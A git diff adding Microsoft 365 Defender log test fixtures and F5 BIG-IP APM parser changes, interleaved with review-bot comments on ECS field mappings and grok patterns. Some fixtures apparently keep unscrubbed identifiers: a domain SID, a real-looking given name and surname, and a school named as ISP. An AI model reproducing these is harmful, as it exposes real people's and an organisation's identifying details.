@@ -0,0 +1,40 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": 
\"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "iam" + ], + "dataset": "identity_info", + "type": [ + "user" + ] + }, + "@timestamp": "2024-10-03T11:13:23.023478Z", + "action": { + "properties": { + "AccountUPN": "johndoe@example.com" + } + }, + "microsoft": { + "defender": { + "report": { + "id": "6aefc315-d9e5-4230-81b4-c2d0b40b6282" + } + } + }, + "related": { + "user": [ + "123456" + ] + }, + "user": { + "domain": "itg.local", + "full_name": "DOE John", + "name": "123456" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon_2.json new file mode 100644 index 000000000..2d87d3742 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon_2.json 
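Review bot: `expected.message` diverges from `input.message`: the input has `\"OnPremSid\": \"S-1\"` while the expected copy still contains `S-1-5-21-2308620423-2764619233-3639949770-5127445`, so the assertion cannot hold if the message is passed through unchanged, and a real domain SID is leaked into the repository. Set the expected value to `\"OnPremSid\": \"S-1\"` to match the input. The anonymisation is also inconsistent within the record — `AccountDisplayName: DOE John` but `GivenName: Emma` / `Surname: TSCHAEN` — which looks like a partially scrubbed real identity; scrub all three to the same placeholder.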
@@ -0,0 +1,58 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-03T11:27:16.2140248Z\", \"tenantId\": \"9f97a043-faf0-4df7-b467-57f7bb72740c\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityLogonEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:24:42.5340000Z\", \"properties\": {\"ActionType\": \"LogonSuccess\", \"LogonType\": \"OAuth2:Authorize\", \"Protocol\": null, \"AccountDisplayName\": \"John DOE\", \"AccountUpn\": \"john.doe@example.com\", \"AccountName\": \"john.doe\", \"AccountDomain\": \"example.com\", \"AccountSid\": null, \"AccountObjectId\": \"9a5a5efc-e558-41d2-b3da-2c4e953eb5c4\", \"IPAddress\": \"1.2.3.4\", \"Location\": \"FR\", \"DeviceName\": null, \"OSPlatform\": \"Windows 10\", \"DeviceType\": \"Desktop\", \"ISP\": \"neoma business school\", \"DestinationDeviceName\": null, \"TargetDeviceName\": null, \"FailureReason\": null, \"Port\": null, \"DestinationPort\": null, \"DestinationIPAddress\": null, \"TargetAccountDisplayName\": null, \"AdditionalFields\": {\"ACTOR.ENTITY_USER\": \"John DOE\", \"ACTOR.ALIAS\": \"John DOE\", \"ARG.CLOUD_SERVICE\": \"Editor Browser Extension\", \"Pass-through authentication\": \"false\", \"Request ID\": \"62a44e8f-2f30-4146-a8c6-047e526e282f\"}, \"ReportId\": \"8e17f393c95c1233d67d61d282ae7b2d4609afa97cc74f68e75dc171e9d691e9\", \"Timestamp\": \"2024-10-03T11:23:16.963Z\", \"Application\": \"Microsoft 365\"}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-03T11:27:16.2140248Z\", \"tenantId\": \"9f97a043-faf0-4df7-b467-57f7bb72740c\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityLogonEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:24:42.5340000Z\", \"properties\": {\"ActionType\": \"LogonSuccess\", \"LogonType\": \"OAuth2:Authorize\", \"Protocol\": null, \"AccountDisplayName\": \"John DOE\", \"AccountUpn\": \"john.doe@example.com\", \"AccountName\": \"john.doe\", \"AccountDomain\": \"example.com\", \"AccountSid\": 
null, \"AccountObjectId\": \"9a5a5efc-e558-41d2-b3da-2c4e953eb5c4\", \"IPAddress\": \"1.2.3.4\", \"Location\": \"FR\", \"DeviceName\": null, \"OSPlatform\": \"Windows 10\", \"DeviceType\": \"Desktop\", \"ISP\": \"neoma business school\", \"DestinationDeviceName\": null, \"TargetDeviceName\": null, \"FailureReason\": null, \"Port\": null, \"DestinationPort\": null, \"DestinationIPAddress\": null, \"TargetAccountDisplayName\": null, \"AdditionalFields\": {\"ACTOR.ENTITY_USER\": \"John DOE\", \"ACTOR.ALIAS\": \"John DOE\", \"ARG.CLOUD_SERVICE\": \"Editor Browser Extension\", \"Pass-through authentication\": \"false\", \"Request ID\": \"62a44e8f-2f30-4146-a8c6-047e526e282f\"}, \"ReportId\": \"8e17f393c95c1233d67d61d282ae7b2d4609afa97cc74f68e75dc171e9d691e9\", \"Timestamp\": \"2024-10-03T11:23:16.963Z\", \"Application\": \"Microsoft 365\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "identity_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-03T11:23:16.963000Z", + "action": { + "properties": { + "AccountUPN": "john.doe@example.com", + "Application": "Microsoft 365", + "ISP": "neoma business school", + "Location": "FR", + "LogonType": "OAuth2:Authorize" + }, + "type": "LogonSuccess" + }, + "host": { + "os": { + "full": "Windows 10" + }, + "type": "Desktop" + }, + "microsoft": { + "defender": { + "report": { + "id": "8e17f393c95c1233d67d61d282ae7b2d4609afa97cc74f68e75dc171e9d691e9" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "domain": "example.com", + "full_name": "John DOE", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon_3.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon_3.json new file mode 100644 index 000000000..68556eb65 --- /dev/null 
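Review bot: `ActionType: LogonSuccess` is surfaced only as `action.type`; the expected block has no `event.outcome` and `event.type` is `["info"]`, so an ECS-based rule looking for successful or failed sign-ins (`event.outcome: success|failure`, `event.type: start`) cannot use this dataset without reading a vendor field. The parser is outside this hunk, but the fixture should pin the intended mapping, e.g. `"outcome": "success"` under `event` and `"type": ["start"]`, with the inverse for `LogonFailed`. Also `"ISP": "neoma business school"` reads like an un-anonymised tenant name that survived the scrub.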
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon_3.json 
@@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-01T08:33:28.2285123Z\", \"tenantId\": \"3f1c3ba0-b477-46a2-bc02-d908ed2f548e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityLogonEvents\", \"_TimeReceivedBySvc\": \"2024-10-01T08:32:19.6154094Z\", \"properties\": {\"ActionType\": \"LogonSuccess\", \"LogonType\": \"Resource access\", \"Protocol\": \"Ntlm\", \"AccountDisplayName\": \"John DOE\", \"AccountUpn\": \"john.doe@example.com\", \"AccountName\": \"johndoe\", \"AccountDomain\": \"example.com\", \"AccountSid\": \"S-1-5-21-1614895754-1343024091-1177238915-9841\", \"AccountObjectId\": \"f701b0c2-2089-481d-ac5c-39707efbb9fe\", \"IPAddress\": null, \"Location\": null, \"DeviceName\": null, \"OSPlatform\": null, \"DeviceType\": null, \"ISP\": null, \"DestinationDeviceName\": \"srv-dc3.example1.com\", \"TargetDeviceName\": \"srv-radiusnps.example1.com\", \"FailureReason\": null, \"Port\": null, \"DestinationPort\": null, \"DestinationIPAddress\": null, \"TargetAccountDisplayName\": null, \"AdditionalFields\": {\"Count\": \"1\", \"Category\": \"Credential Access\", \"AttackTechniques\": \"Steal or Forge Kerberos Tickets (T1558), Kerberoasting (T1558.003)\", \"IsResourceAccountTrustedForUnconstrainedDelegation\": \"False\", \"SourceAccountId\": \"9db21c13-c6e8-40ed-ae14-d94c75ac9419\", \"SourceAccountSid\": \"S-1-5-21-1614895754-1343024091-1177238915-9841\", \"DestinationComputerObjectGuid\": \"ef496270-3384-4ca2-97c2-fdc70f595ded\", \"DestinationComputerOperatingSystem\": \"windows server 2019 standard\", \"DestinationComputerOperatingSystemVersion\": \"10.0 (17763)\", \"DestinationComputerOperatingSystemType\": \"windows\", \"TargetComputerObjectGuid\": \"86183b3b-79d4-4b7e-a291-488c20fe495b\", \"TargetComputerOperatingSystem\": \"windows server 2019 datacenter\", \"TargetComputerOperatingSystemVersion\": \"10.0 (17763)\", \"TargetComputerOperatingSystemType\": \"windows\", \"ACTOR.ACCOUNT\": \"John DOE\", 
\"ACTOR.ENTITY_USER\": \"John DOE\", \"TO.DEVICE\": \"SRV-DC3\", \"TARGET_OBJECT.DEVICE\": \"SRV-RADIUSNPS\"}, \"ReportId\": \"9afc4a29-e0a6-4bd0-9afa-1faf1ee6da5e\", \"Timestamp\": \"2024-10-01T08:29:14.6761149Z\", \"Application\": \"Active Directory\"}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-01T08:33:28.2285123Z\", \"tenantId\": \"3f1c3ba0-b477-46a2-bc02-d908ed2f548e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityLogonEvents\", \"_TimeReceivedBySvc\": \"2024-10-01T08:32:19.6154094Z\", \"properties\": {\"ActionType\": \"LogonSuccess\", \"LogonType\": \"Resource access\", \"Protocol\": \"Ntlm\", \"AccountDisplayName\": \"John DOE\", \"AccountUpn\": \"john.doe@example.com\", \"AccountName\": \"johndoe\", \"AccountDomain\": \"example.com\", \"AccountSid\": \"S-1-5-21-1614895754-1343024091-1177238915-9841\", \"AccountObjectId\": \"f701b0c2-2089-481d-ac5c-39707efbb9fe\", \"IPAddress\": null, \"Location\": null, \"DeviceName\": null, \"OSPlatform\": null, \"DeviceType\": null, \"ISP\": null, \"DestinationDeviceName\": \"srv-dc3.example1.com\", \"TargetDeviceName\": \"srv-radiusnps.example1.com\", \"FailureReason\": null, \"Port\": null, \"DestinationPort\": null, \"DestinationIPAddress\": null, \"TargetAccountDisplayName\": null, \"AdditionalFields\": {\"Count\": \"1\", \"Category\": \"Credential Access\", \"AttackTechniques\": \"Steal or Forge Kerberos Tickets (T1558), Kerberoasting (T1558.003)\", \"IsResourceAccountTrustedForUnconstrainedDelegation\": \"False\", \"SourceAccountId\": \"9db21c13-c6e8-40ed-ae14-d94c75ac9419\", \"SourceAccountSid\": \"S-1-5-21-1614895754-1343024091-1177238915-9841\", \"DestinationComputerObjectGuid\": \"ef496270-3384-4ca2-97c2-fdc70f595ded\", \"DestinationComputerOperatingSystem\": \"windows server 2019 standard\", \"DestinationComputerOperatingSystemVersion\": \"10.0 (17763)\", \"DestinationComputerOperatingSystemType\": \"windows\", 
\"TargetComputerObjectGuid\": \"86183b3b-79d4-4b7e-a291-488c20fe495b\", \"TargetComputerOperatingSystem\": \"windows server 2019 datacenter\", \"TargetComputerOperatingSystemVersion\": \"10.0 (17763)\", \"TargetComputerOperatingSystemType\": \"windows\", \"ACTOR.ACCOUNT\": \"John DOE\", \"ACTOR.ENTITY_USER\": \"John DOE\", \"TO.DEVICE\": \"SRV-DC3\", \"TARGET_OBJECT.DEVICE\": \"SRV-RADIUSNPS\"}, \"ReportId\": \"9afc4a29-e0a6-4bd0-9afa-1faf1ee6da5e\", \"Timestamp\": \"2024-10-01T08:29:14.6761149Z\", \"Application\": \"Active Directory\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "identity_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-01T08:29:14.676114Z", + "action": { + "properties": { + "AccountSid": "S-1-5-21-1614895754-1343024091-1177238915-9841", + "AccountUPN": "john.doe@example.com", + "Application": "Active Directory", + "DestinationDeviceName": "srv-dc3.example1.com", + "LogonType": "Resource access", + "TargetDeviceName": "srv-radiusnps.example1.com" + }, + "type": "LogonSuccess" + }, + "microsoft": { + "defender": { + "report": { + "id": "9afc4a29-e0a6-4bd0-9afa-1faf1ee6da5e" + } + } + }, + "network": { + "protocol": "Ntlm" + }, + "related": { + "user": [ + "johndoe" + ] + }, + "user": { + "domain": "example.com", + "full_name": "John DOE", + "name": "johndoe" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_query_2.json new file mode 100644 index 000000000..9b162e127 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_identity_query_2.json 
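Review bot: The MDI enrichment in `AdditionalFields` — `Category: "Credential Access"` and `AttackTechniques: "Steal or Forge Kerberos Tickets (T1558), Kerberoasting (T1558.003)"` — is dropped from the expected output, although it is the most detection-relevant content of this event (a Kerberoasting annotation on an NTLM resource access to a domain controller). ECS has `threat.tactic.name`, `threat.technique.id` and `threat.technique.name` for exactly this; the parser is outside the hunk, but the fixture should expect something like `"threat": {"tactic": {"name": ["Credential Access"]}, "technique": {"id": ["T1558", "T1558.003"]}}`. `DestinationDeviceName`/`TargetDeviceName` are likewise only kept under `action.properties`, so neither DC appears in `destination.domain` or `related.hosts`; and `network.protocol: "Ntlm"` should be lowercased (`ntlm`) per ECS convention so it matches other sources.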
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-01T08:33:55.2270559Z\", \"tenantId\": \"d8454584-ffe7-430e-9123-2b0c51f35475\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityQueryEvents\", \"_TimeReceivedBySvc\": \"2024-10-01T08:32:45.9638646Z\", \"properties\": {\"ActionType\": \"DNS query\", \"QueryTarget\": \"1.cnr.io\", \"Protocol\": \"Dns\", \"AccountDisplayName\": null, \"AccountUpn\": null, \"AccountName\": null, \"AccountDomain\": null, \"AccountSid\": null, \"AccountObjectId\": null, \"Query\": null, \"IPAddress\": \"5.6.7.8\", \"Location\": null, \"DeviceName\": \"SRV-FILES\", \"QueryType\": \"Text\", \"DestinationDeviceName\": \"srv-dc1.example.com\", \"TargetAccountDisplayName\": null, \"TargetDeviceName\": null, \"Port\": 38529, \"DestinationPort\": 53, \"DestinationIPAddress\": \"1.2.3.4\", \"TargetAccountUpn\": null, \"AdditionalFields\": {\"Count\": \"1\", \"ARG.TASK\": \"DNS query\", \"SourceComputerOperatingSystemType\": \"unknown\", \"DestinationComputerObjectGuid\": \"bbcbe3ae-1e7a-432f-ae9d-a8e58e38ce8b\", \"DestinationComputerOperatingSystem\": \"windows server 2019 datacenter\", \"DestinationComputerOperatingSystemVersion\": \"10.0 (17763)\", \"DestinationComputerOperatingSystemType\": \"windows\", \"SourceComputerId\": \"computer domain office srv-files\", \"FROM.DEVICE\": \"SRV-FILES\", \"TO.DEVICE\": \"SRV-DC1\", \"ACTOR.DEVICE\": \"\"}, \"ReportId\": \"b127257b-9688-4f71-ae86-93e4e4a39464\", \"Timestamp\": \"2024-10-01T08:32:08.211673Z\", \"Application\": \"Active Directory\"}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-01T08:33:55.2270559Z\", \"tenantId\": \"d8454584-ffe7-430e-9123-2b0c51f35475\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityQueryEvents\", \"_TimeReceivedBySvc\": \"2024-10-01T08:32:45.9638646Z\", \"properties\": {\"ActionType\": \"DNS query\", \"QueryTarget\": \"1.cnr.io\", \"Protocol\": \"Dns\", 
\"AccountDisplayName\": null, \"AccountUpn\": null, \"AccountName\": null, \"AccountDomain\": null, \"AccountSid\": null, \"AccountObjectId\": null, \"Query\": null, \"IPAddress\": \"5.6.7.8\", \"Location\": null, \"DeviceName\": \"SRV-FILES\", \"QueryType\": \"Text\", \"DestinationDeviceName\": \"srv-dc1.example.com\", \"TargetAccountDisplayName\": null, \"TargetDeviceName\": null, \"Port\": 38529, \"DestinationPort\": 53, \"DestinationIPAddress\": \"1.2.3.4\", \"TargetAccountUpn\": null, \"AdditionalFields\": {\"Count\": \"1\", \"ARG.TASK\": \"DNS query\", \"SourceComputerOperatingSystemType\": \"unknown\", \"DestinationComputerObjectGuid\": \"bbcbe3ae-1e7a-432f-ae9d-a8e58e38ce8b\", \"DestinationComputerOperatingSystem\": \"windows server 2019 datacenter\", \"DestinationComputerOperatingSystemVersion\": \"10.0 (17763)\", \"DestinationComputerOperatingSystemType\": \"windows\", \"SourceComputerId\": \"computer domain office srv-files\", \"FROM.DEVICE\": \"SRV-FILES\", \"TO.DEVICE\": \"SRV-DC1\", \"ACTOR.DEVICE\": \"\"}, \"ReportId\": \"b127257b-9688-4f71-ae86-93e4e4a39464\", \"Timestamp\": \"2024-10-01T08:32:08.211673Z\", \"Application\": \"Active Directory\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "iam" + ], + "dataset": "identity_query_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-01T08:32:08.211673Z", + "action": { + "properties": { + "Application": "Active Directory", + "DestinationDeviceName": "srv-dc1.example.com", + "QueryTarget": "1.cnr.io", + "QueryType": "Text" + }, + "type": "DNS query" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 53 + }, + "host": { + "name": "SRV-FILES" + }, + "microsoft": { + "defender": { + "report": { + "id": "b127257b-9688-4f71-ae86-93e4e4a39464" + } + } + }, + "network": { + "protocol": "Dns" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + } + } +} \ No newline at end of file 
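Review bot: For a `DNS query` event the queried name `QueryTarget: 1.cnr.io` only lands in `action.properties.QueryTarget`, so it is absent from `dns.question.name` and from `related.hosts`, which is where analysts pivot; likewise `DestinationDeviceName: srv-dc1.example.com` is not reflected in `destination.domain`. The parser is outside this hunk, but the expected block should pin e.g. `"dns": {"question": {"name": "1.cnr.io"}}` and add `1.cnr.io` / `srv-dc1.example.com` to `related.hosts`. `event.category: ["iam"]` is arguably a poor fit for a DNS query even though it comes from the IdentityQueryEvents table; `["network"]` with `event.type: ["protocol"]` would be closer to ECS usage.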
diff --git a/Microsoft/microsoft-365-defender/tests/test_url_click_events.json b/Microsoft/microsoft-365-defender/tests/test_url_click_events.json
new file mode 100644
index 000000000..3e80bed25
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_url_click_events.json
@@ -0,0 +1,53 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-03T11:23:25.9069421Z\", \"tenantId\": \"bcee9af7-3fd7-4c29-b238-eeb1dc4b46d8\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-UrlClickEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:23:00.0292845Z\", \"properties\": {\"ReportId\": \"2ad2033f-6f85-49bb-9ab7-e67f791edd93\", \"Url\": \"https://example.com/index.php?q=some+stuff\", \"NetworkMessageId\": \"703451b5-2f1e-4c4b-8494-3f5bf8820f3b\", \"Timestamp\": \"2024-10-03T11:22:59Z\", \"AccountUpn\": \"john.doe@example.com\", \"UrlChain\": \"[\\\"https://example.com/index.php?q=some+stuff\\\",\\\"https://example.com/index.php?q=some+stuff&p=2\\\"]\", \"ActionType\": \"ClickAllowed\", \"ThreatTypes\": null, \"DetectionMethods\": null, \"Workload\": \"Email\", \"IPAddress\": \"1.2.3.4\", \"IsClickedThrough\": false}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-03T11:23:25.9069421Z\", \"tenantId\": \"bcee9af7-3fd7-4c29-b238-eeb1dc4b46d8\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-UrlClickEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:23:00.0292845Z\", \"properties\": {\"ReportId\": \"2ad2033f-6f85-49bb-9ab7-e67f791edd93\", \"Url\": \"https://example.com/index.php?q=some+stuff\", \"NetworkMessageId\": \"703451b5-2f1e-4c4b-8494-3f5bf8820f3b\", \"Timestamp\": \"2024-10-03T11:22:59Z\", \"AccountUpn\": \"john.doe@example.com\", \"UrlChain\": \"[\\\"https://example.com/index.php?q=some+stuff\\\",\\\"https://example.com/index.php?q=some+stuff&p=2\\\"]\", \"ActionType\": \"ClickAllowed\", \"ThreatTypes\": null, \"DetectionMethods\": null, \"Workload\": \"Email\", \"IPAddress\": \"1.2.3.4\", \"IsClickedThrough\": false}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "web" + ], + "dataset": "url_click_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-03T11:22:59Z", + "action": { + "properties": { + "AccountUPN": "john.doe@example.com" + }, + 
"type": "ClickAllowed" + }, + "email": { + "local_id": "703451b5-2f1e-4c4b-8494-3f5bf8820f3b" + }, + "microsoft": { + "defender": { + "report": { + "id": "2ad2033f-6f85-49bb-9ab7-e67f791edd93" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "domain": "example.com", + "original": "https://example.com/index.php?q=some+stuff", + "path": "/index.php", + "port": 443, + "query": "q=some+stuff", + "registered_domain": "example.com", + "scheme": "https", + "top_level_domain": "com" + } + } +} \ No newline at end of file From b65ceefda764cefb10db127235fdad3f77320d4c Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Tue, 8 Oct 2024 18:53:22 +0300 Subject: [PATCH 122/317] Fix: F5 Big Ip APM events support --- F5 Networks/f5-big-ip/_meta/fields.yml | 5 +++ .../f5-big-ip/_meta/smart-descriptions.json | 8 ++++ F5 Networks/f5-big-ip/ingest/parser.yml | 13 +++++- .../f5-big-ip/tests/test_apm_access_1.json | 45 +++++++++++++++++++ .../f5-big-ip/tests/test_apm_access_2.json | 45 +++++++++++++++++++ .../f5-big-ip/tests/test_apm_access_3.json | 44 ++++++++++++++++++ .../f5-big-ip/tests/test_apm_access_4.json | 44 ++++++++++++++++++ .../tests/session_integrity.json | 14 ++++-- 8 files changed, 212 insertions(+), 6 deletions(-) create mode 100644 F5 Networks/f5-big-ip/tests/test_apm_access_1.json create mode 100644 F5 Networks/f5-big-ip/tests/test_apm_access_2.json create mode 100644 F5 Networks/f5-big-ip/tests/test_apm_access_3.json create mode 100644 F5 Networks/f5-big-ip/tests/test_apm_access_4.json diff --git a/F5 Networks/f5-big-ip/_meta/fields.yml b/F5 Networks/f5-big-ip/_meta/fields.yml index de3380c4b..5ba8e71be 100644 --- a/F5 Networks/f5-big-ip/_meta/fields.yml +++ b/F5 Networks/f5-big-ip/_meta/fields.yml @@ -37,3 +37,8 @@ f5.bigip.afm.vlan: description: '' name: f5.bigip.afm.vlan type: keyword + +f5.bigip.apm.rule_item: + description: '' + name: f5.bigip.apm.rule_item + type: keyword 
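Review bot: `UrlChain` — a JSON-encoded array string holding the full redirect chain — and `IsClickedThrough` are both absent from the expected output, so a Safe Links click that went through the warning page cannot be distinguished from a plain allowed click, and the intermediate redirect hosts are lost for blocklist matching. The parser is outside this hunk, but the fixture should pin a mapping such as `"microsoft": {"defender": {"url": {"chain": [...], "clicked_through": false}}}` (the chain needs a `from_json` step since it is double-encoded). `ActionType: ClickAllowed` is also only kept as `action.type`; setting `event.action` from it (as the post-delivery fixture does for `Action`) would keep the two email datasets consistent.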
diff --git a/F5 Networks/f5-big-ip/_meta/smart-descriptions.json b/F5 Networks/f5-big-ip/_meta/smart-descriptions.json index bfd90ed31..3864c1402 100644 --- a/F5 Networks/f5-big-ip/_meta/smart-descriptions.json +++ b/F5 Networks/f5-big-ip/_meta/smart-descriptions.json @@ -73,5 +73,13 @@ { "field": "source.address" }, { "field": "destination.address" } ] + }, + { + "value": "Rule {rule.name} triggered by {source.address} on item {f5.bigip.apm.rule_item}", + "conditions": [ + { "field": "rule.name" }, + { "field": "source.address" }, + { "field": "f5.bigip.apm.rule_item" } + ] } ] diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml index 77ee4ea1b..01f4599e3 100644 --- a/F5 Networks/f5-big-ip/ingest/parser.yml +++ b/F5 Networks/f5-big-ip/ingest/parser.yml @@ -112,12 +112,15 @@ pipeline: output_field: message pattern: '%{HEADER}?%{DATA:rule_name}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{PAYLOAD}' custom_patterns: - HEADER: '\s*%{WORD:action_type}\[\d*\]:\s*(\d*:\d*: )' - PAYLOAD: "%{PAYLOAD_USER}|%{PAYLOAD_USER_AUTH_WITH_DOMAIN}|%{PAYLOAD_USER_AUTH}|%{PAYLOAD_NEW_SESSION}" + HEADER: '%{HEADER_1}|%{HEADER_2}' + HEADER_1: '%{DATA:date} %{TIME:time} %{IPORHOST:source_domain} %{DATA:action_type} %{DATA}\[\d*\]:\s*(\d*:\d*: )' + HEADER_2: '\s*%{WORD:action_type}\[\d*\]:\s*(\d*:\d*: )' + PAYLOAD: "%{PAYLOAD_USER}|%{PAYLOAD_USER_AUTH_WITH_DOMAIN}|%{PAYLOAD_USER_AUTH}|%{PAYLOAD_NEW_SESSION}|%{PAYLOAD_ACCESS}" PAYLOAD_USER: "Username '%{DATA:user_name}'" PAYLOAD_USER_AUTH: ".*authenticate with '%{DATA:user_name}'.*" PAYLOAD_USER_AUTH_WITH_DOMAIN: ".*authenticate with '%{DATA:user_name}@%{DATA:user_domain}'.*" PAYLOAD_NEW_SESSION: 'New session from \s*client IP %{IP:src_ip} \(%{DATA}\) at VIP %{IP:dest_ip}.*' + PAYLOAD_ACCESS: "Following rule '%{DATA:rule_name}' from item '%{DATA:rule_item}' to %{DATA} '%{DATA}'" - name: set_apm_event filter: "{{ parse_apm_event.message != None }}" 
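Review bot: In `HEADER_1` the `%{DATA:action_type}` token captures the syslog severity (`notice` in the new fixtures) while `HEADER_2` captures the daemon name (`apmd`) under the same `action_type`, so the field means two different things depending on which header matched. Use `%{WORD:severity} %{WORD:action_type}\[\d*\]` in `HEADER_1` so `action_type` is `apmd` in both forms. `PAYLOAD_ACCESS` also reuses `rule_name`, which the outer pattern already assigns to the access-policy path (`/DMZ/APM_ADSB_test`); the fixtures show the later capture winning, but that depends on the grok engine's duplicate-name behaviour — rename one of them (e.g. `%{DATA:policy_name}` in the outer pattern). Finally, four consecutive `%{DATA}` tokens in `HEADER_1` backtrack heavily on non-matching lines; `%{SYSLOGTIMESTAMP}` for the date/time and `%{WORD}` where a word is expected would bound that.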
